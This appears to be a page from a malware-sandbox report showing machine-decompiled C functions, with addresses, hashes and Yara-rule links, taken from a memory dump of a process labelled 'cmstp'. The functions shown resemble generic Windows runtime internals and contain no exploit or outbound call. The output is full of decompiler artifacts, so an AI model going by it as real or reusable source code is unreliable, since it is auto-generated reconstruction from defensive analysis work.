0x051054e0
0x051054ed
0x051054f2
0x051054f9
0x051054fd
0x05105507
0x00000000
0x05105507
0x0510543c

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c6ce59b5ffb69eb63d706d5fd0fe70ffeef3372872ccc4a57cbb87122c4aaa8
Instruction ID: 1fa2cf35ae3503c7429c4e8e59f5bb42dc60b40650f2ac248d5978912f809c77
Opcode Fuzzy Hash: 7c6ce59b5ffb69eb63d706d5fd0fe70ffeef3372872ccc4a57cbb87122c4aaa8
Instruction Fuzzy Hash: F341AD30A057448FDB25DFA484047FEBAA3BF52204F15192ED086A7281DBB55906CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0510A70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0510A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x51c7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x51c7b10 = 8;
					 *0x51c7b14 = 0x51c7b0c;
					 *0x51c7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0510A990(0x51c7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0510A840(__edx, __ecx, __ecx, _t52, 0x51c7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x51c7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x51c7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x51c7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L050F4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x51c7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0511F3E0(_t50,  *0x51c7b14, _t8 >> 3);
						_t28 =  *0x51c7b14; // 0x77577b0c
						__eflags = _t28 - 0x51c7b0c;
						if(_t28 != 0x51c7b0c) {
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x51c7b14 = _t50;
						_t48 = _v12;
						 *0x51c7b10 = _t9;
						goto L6;
					}
					 *0x51c7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x0510a713
0x0510a714
0x0510a717
0x0510a71d
0x0510a720
0x0510a722
0x0510a727
0x0510a74a
0x0510a754
0x0510a75e
0x0510a768
0x0510a76a
0x0510a773
0x0510a78b
0x0510a790
0x0510a792
0x0510a741
0x0510a741
0x0510a743
0x0510a749
0x0510a749
0x0510a732
0x0510a73a
0x0510a797
0x0510a79d
0x0510a7a3
0x0510a7a9
0x0510a7b6
0x0510a7bc
0x0510a7ca
0x0510a7e0
0x0510a7e2
0x0510a7e4
0x05149bf2
0x00000000
0x05149bf2
0x0510a7ed
0x0510a7f2
0x0510a800
0x0510a805
0x0510a80d
0x0510a812
0x05149c08
0x05149c08
0x0510a818
0x0510a81b
0x0510a821
0x0510a824
0x00000000
0x0510a824
0x0510a7ae
0x00000000
0x0510a7ae
0x0510a73c
0x0510a73e
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6a724b28067211ac6b37b987bdeb739b4f0d3650c1b944e485c0a1f96f6cc05
Instruction ID: 2518e9cd1c8e3230a561a6d92df4b0b95eed5bf3d395444fc3371e3365c2c770
Opcode Fuzzy Hash: e6a724b28067211ac6b37b987bdeb739b4f0d3650c1b944e485c0a1f96f6cc05
Instruction Fuzzy Hash: 4E31C0B16202009BE715DB48E8C1F69BFFAFB84710F15495EE115872C1DBF2A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 051061A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E051061A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E05105E50(0x50b67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E051A9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E050DF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x051061b3
0x051061b5
0x051061bd
0x051061c3
0x051061c7
0x051061d2
0x051061ff
0x051061ff
0x05106201
0x05106207
0x05106207
0x051061d4
0x051061d9
0x00000000
0x00000000
0x051061df
0x051061e2
0x00000000
0x00000000
0x051061e6
0x051061e8
0x051061ee
0x051061ee
0x051061f9
0x0514762f
0x05147632
0x05147635
0x05147639
0x05147640
0x0514766e
0x05147675
0x00000000
0x00000000
0x05147681
0x05147689
0x0514768d
0x05147691
0x05147695
0x05147699
0x051476af
0x051476b5
0x051476b7
0x051476b7
0x051476d7
0x051476dc
0x00000000
0x051476dc
0x051476a2
0x051476a9
0x05147651
0x05147653
0x05147653
0x05147656
0x05147656
0x00000000
0x05147656
0x05147644
0x05147646
0x05147648
0x05147648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ade11d3e5796c4735955603e0325539d2960c33246dcb953a513a2d774e141eb
Instruction ID: 6413428905f51c09f68fc81bb15722522751780b771f287bf5615cd927344e46
Opcode Fuzzy Hash: ade11d3e5796c4735955603e0325539d2960c33246dcb953a513a2d774e141eb
Instruction Fuzzy Hash: 2931AB726093018FE720CF09C900B2AF7E6FB88B00F05596DF8999B391E7B0E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 050DAA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E050DAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x51cd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x51c7b9c; // 0x0
					_t53 = L050F4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0511B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0511F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L050E6C59(_t53, _t51, _t58) != 0) {
							_t28 = E05105E50(0x50bc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0510B230(_v32, _v28, 0x50bc2d8, 1,  &_v24);
								_t28 = E050DF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x050daa25
0x050daa29
0x050daa2d
0x050daa30
0x050daa37
0x050daa3c
0x05134458
0x05134458
0x05134472
0x05134474
0x05134476
0x050daa64
0x050daa74
0x0513447c
0x05134483
0x05134492
0x050daa52
0x050daa54
0x050daa5e
0x051344a8
0x051344ad
0x051344af
0x051344b6
0x051344b6
0x051344b9
0x051344bc
0x051344cd
0x051344d3
0x051344d6
0x051344e1
0x051344e1
0x051344e6
0x051344e8
0x051344fb
0x051344fb
0x051344e8
0x00000000
0x050daa5e
0x05134476
0x050daa42
0x050daa46
0x050daa48
0x050daa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3b52c6165e0c0c1f76ad562cb3d849c75eef34df186a80c218f929c94dc507e
Instruction ID: f5af7511a17950389980f196465c4f11769429e4aa8621a405326a8348109bea
Opcode Fuzzy Hash: f3b52c6165e0c0c1f76ad562cb3d849c75eef34df186a80c218f929c94dc507e
Instruction Fuzzy Hash: 1431E371A00219ABDF10DF68DD86ABFB7B9FF04700B054069F901EB140E7B9AD51DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05118EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E05118EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x51cd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E05104E70(0x51c86e4, 0x5119490, 0, 0);
					if( *0x51c53e8 > 5 && E05118F33(0x51c53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x51c53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x51c53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x50bbc46;
						_t48 = E05157B9C(0x51c53e8, 0x50bbc46, _t67, 0x51c53e8, _t70,  &_v140);
					}
				}
				return E0511B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x05118ec7
0x05118ed9
0x05118edc
0x05118ee6
0x05118ee9
0x05118eee
0x05118efc
0x05118f08
0x05151349
0x05151353
0x0515135d
0x05151366
0x0515136f
0x05151375
0x0515137c
0x05151385
0x05151390
0x05151391
0x0515139c
0x0515139d
0x051513a6
0x051513ac
0x051513b2
0x051513b5
0x051513bc
0x051513bf
0x051513c2
0x051513c5
0x051513c8
0x051513cb
0x051513ce
0x051513d1
0x051513d4
0x051513d7
0x051513da
0x051513dd
0x051513e0
0x051513e3
0x051513e6
0x051513e9
0x051513f6
0x05151400
0x05151400
0x05118f08
0x05118f32

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6950450c8d8be0710938ccfa93fbecab690c4a32f455938259bffd8c84b96c
Instruction ID: 536fcf8a520ababe84da229ea049a54b593057b7e8ba6a5012aed1cb891fab24
Opcode Fuzzy Hash: 8a6950450c8d8be0710938ccfa93fbecab690c4a32f455938259bffd8c84b96c
Instruction Fuzzy Hash: 7641C3B1D00318AFDB20CFAAD981AADFBF5FB48310F5081AEE909A7241D7745A84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05114A2C Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E05114A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x51cd360 ^ _t62;
				_v8 =  *0x51cd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E050F2280(_t26, 0x51c8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E050EFFB0(_t41, _t51, 0x51c8608);
						L2:
						 *0x51cb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0511B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E050F2280(_t28, 0x51c8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E050EFFB0(_t42, _t53, 0x51c8608);
							if(_t53 != 0) {
								L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E050EFFB0(_t41, _t51, 0x51c8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x05114a2c
0x05114a34
0x05114a3c
0x05114a3e
0x05114a48
0x05114a4b
0x05114a4d
0x05114a51
0x05114a9c
0x00000000
0x00000000
0x05114aa3
0x05114aa8
0x05114aad
0x05114ab1
0x05114ade
0x05114ae3
0x05114a5a
0x05114a62
0x05114a6a
0x05114a6e
0x0514f203
0x05114a84
0x05114a88
0x05114a89
0x05114a8a
0x05114a95
0x05114a95
0x05114a79
0x05114a80
0x05114af2
0x05114af4
0x05114af9
0x05114aff
0x05114b01
0x05114b03
0x05114b08
0x0514f20a
0x0514f212
0x0514f216
0x0514f216
0x05114b08
0x05114b13
0x05114b1a
0x0514f229
0x0514f229
0x05114b1a
0x05114a82
0x00000000
0x05114a82
0x05114ab7
0x05114acd
0x05114acd
0x05114ad5
0x05114ada
0x00000000
0x05114ada
0x05114ac2
0x05114acb
0x00000000
0x00000000
0x00000000
0x05114acb
0x05114a53
0x05114a53
0x05114a58
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c64d655f214515cbd3846a03086394077efeed48f1ac7e4ab3928d102306561f
Instruction ID: 08bea6f00895e2d41075cd3e58e75fe643a45359cee9cf58991cca384182a53c
Opcode Fuzzy Hash: c64d655f214515cbd3846a03086394077efeed48f1ac7e4ab3928d102306561f
Instruction Fuzzy Hash: 0F31D132205361AFDB31DF14E985B6ABBA6FF94B10F0245B9E9574B640CBB1D801CB8D

Uniqueness

Uniqueness Score: -1.00%

Function 0510E730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0510E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E05119670() < 0) {
					L0512DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x51c7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L050F4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0510E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x0510e730
0x0510e736
0x0510e738
0x0510e73d
0x0510e73e
0x0510e740
0x0510e749
0x0510e765
0x0510e76a
0x0510e76b
0x0510e76c
0x0510e76d
0x0510e76e
0x0510e76f
0x0510e775
0x0510e777
0x0510e77e
0x0514b675
0x0510e784
0x0510e784
0x0510e789
0x0510e7a8
0x0510e7ac
0x0510e807
0x0510e7ae
0x0510e7ae
0x0510e7b1
0x0510e7b4
0x0510e7b9
0x0510e7c0
0x0510e7c4
0x0510e7ca
0x0510e7cc
0x00000000
0x0510e7d3
0x0510e7d6
0x00000000
0x00000000
0x0510e7ff
0x0510e802
0x00000000
0x00000000
0x0510e7f9
0x0510e7fc
0x00000000
0x00000000
0x0510e7f3
0x0510e7f6
0x00000000
0x00000000
0x0510e7ed
0x0510e7f0
0x00000000
0x00000000
0x0510e7e7
0x0510e7ea
0x00000000
0x00000000
0x0514b685
0x0514b688
0x00000000
0x00000000
0x0514b682
0x00000000
0x00000000
0x0510e7cc
0x0510e7d9
0x0510e7dc
0x0510e7de
0x0510e7de
0x0510e7ac
0x0510e7e4
0x0510e74b
0x0510e751
0x0510e759
0x0510e761
0x0510e761

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dbf026d66d136c7034e40d4bf17482bbab581fac36100e52265b83fcf33f0b6
Instruction ID: 8a4539a1472b88923ab10c8b1839995e492414b243f342a69c8cce5dbd1cc9fa
Opcode Fuzzy Hash: 2dbf026d66d136c7034e40d4bf17482bbab581fac36100e52265b83fcf33f0b6
Instruction Fuzzy Hash: AF318D75A18249AFD744DF19D841B9ABBE8FB08310F148666F904CB381E771E980CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0510BC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0510BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x51c6100; // 0x37
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E050F2280(0xd, 0x198df1a0);
				_t41 =  *0x51c60f8; // 0x0
				if(_t41 != 0) {
					 *0x51c60f8 =  *_t41;
					 *0x51c60fc =  *0x51c60fc + 0xffff;
				}
				E050EFFB0(_t41, 0x800, 0x198df1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x51c60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L050F4620(0x51c6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x51c6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0510bc36
0x0510bc42
0x0510bc45
0x0510bc4a
0x0510bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0510bc50
0x0510bc50
0x0510bc58
0x0510bc5a
0x0510bc60
0x00000000
0x00000000
0x0514a4f2
0x0514a4f6
0x00000000
0x00000000
0x00000000
0x0514a4fc
0x0510bc79
0x0510bc7e
0x0510bc86
0x0510bd16
0x0510bd20
0x0510bd20
0x0510bc8d
0x0510bc94
0x0510bcbd
0x0510bcca
0x0510bccb
0x0510bccc
0x0510bccd
0x0510bcce
0x0510bcd4
0x0510bcea
0x0510bcee
0x0510bcf2
0x0510bd00
0x0510bd04
0x00000000
0x0510bc96
0x0510bcab
0x0510bcaf
0x0510bd2c
0x0510bd2c
0x0510bd09
0x00000000
0x0510bd09
0x0510bcb1
0x0510bcb5
0x0510bcbb
0x00000000
0x00000000
0x00000000
0x0510bcbb

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45b18e5d3661a9bfd7845d1939556126e51306c0b18d8415fd6affd09082d0ce
Instruction ID: 177072cbbc8c4a48694b2cd959df4a846fbac60992d579465a9f7bff8a24696b
Opcode Fuzzy Hash: 45b18e5d3661a9bfd7845d1939556126e51306c0b18d8415fd6affd09082d0ce
